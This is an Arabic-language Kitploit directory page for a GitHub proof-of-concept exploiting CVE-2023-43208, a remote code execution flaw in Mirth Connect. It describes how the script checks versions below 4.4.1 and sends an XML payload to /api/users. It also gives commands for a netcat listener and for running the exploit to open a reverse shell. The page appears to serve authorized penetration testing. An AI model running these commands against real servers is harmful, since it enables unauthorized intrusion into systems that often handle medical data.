Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-43208 — إثبات المفهوم (PoC) لاستغلال CVE-2023-43208 (RCE). | Kitploit
أدوات/GitHubGitHub/predyy/cve-2023-43208
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubpredyy/cve-2023-43208

CVE-2023-43208

إثبات المفهوم (PoC) لاستغلال CVE-2023-43208 (RCE).

عرض المستودع
11منذ 5 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-43208 Mirth Connect RCE PoC

نص بايثون لإثبات المفهوم يستهدف CVE-2023-43208 في Mirth Connect.

إخلاء مسؤولية

استخدم فقط في بيئات تملكها أو مخول صراحةً لاختبارها. هذا المستودع مخصص لأغراض البحث الأمني والتحقق والاختبار الدفاعي. لا يتحمل المؤلف أي مسؤولية عن أي استخدام خاطئ أو ضرر ناتج عن هذه الأداة.

نظرة عامة

exp.py هو نسخة قليلة الاعتماديات من PoC والتي:

  • تكتشف ما إذا كان الهدف يبدو وكأنه مثيل Mirth Connect
  • تطلب إصدار Mirth Connect من /api/server/version
  • تتحقق مما إذا كان الإصدار أقل من 4.4.1
  • ترسل حمولة XML إلى /api/users إذا بدا الهدف ضعيفًا

البرنامج النصي يستخدم HTTPS افتراضيًا ويمكن التبديل إلى HTTP باستخدام --http.

الاستخدام

root@kitploit:~
python3 exp.py -u <target> -lh <listener_host> -lp <listener_port> [--http]

الوسائط

  • -u, --url: عنوان URL أو مضيف Mirth Connect المستهدف
  • -lh, --lhost: المضيف المحلي/IP للاتصال العكسي
  • -lp, --lport: منفذ الاستماع المحلي
  • --http: فرض HTTP بدلاً من HTTPS (الافتراضي هو HTTPS)

مثال

ابدأ مستمعًا أولاً:

root@kitploit:~
nc -lvnp 4444

شغّل البرنامج النصي:

root@kitploit:~
python3 exp.py -u https://target.example.com -lh 192.168.1.10 -lp 4444

لهدف يعمل فقط عبر HTTP:

root@kitploit:~
python3 exp.py -u target.example.com -lh 192.168.1.10 -lp 4444 --http

ملاحظات

  • تم تعطيل التحقق من شهادة SSL في البرنامج النصي.
  • يطلب البرنامج النصي تأكيدًا قبل إرسال الحمولة.
  • يعتمد كشف الإصدار على مقارنة دلالية مقابل 4.4.1.
  • الهدف الذي يتم اكتشافه على أنه Mirth Connect ليس مضمونًا أن يكون قابلاً للاستغلال (قد تؤثر الاختلافات في الشبكة والبيئة ووقت التشغيل على النتائج).

الاعتمادات

  • اكتشاف الثغرة الأصلية: IHTeam
  • الكود الأصلي: K3ysTr0K3R و Chocapikk
  • نسخة قليلة الاعتماديات: predyy
تنزيل الأداة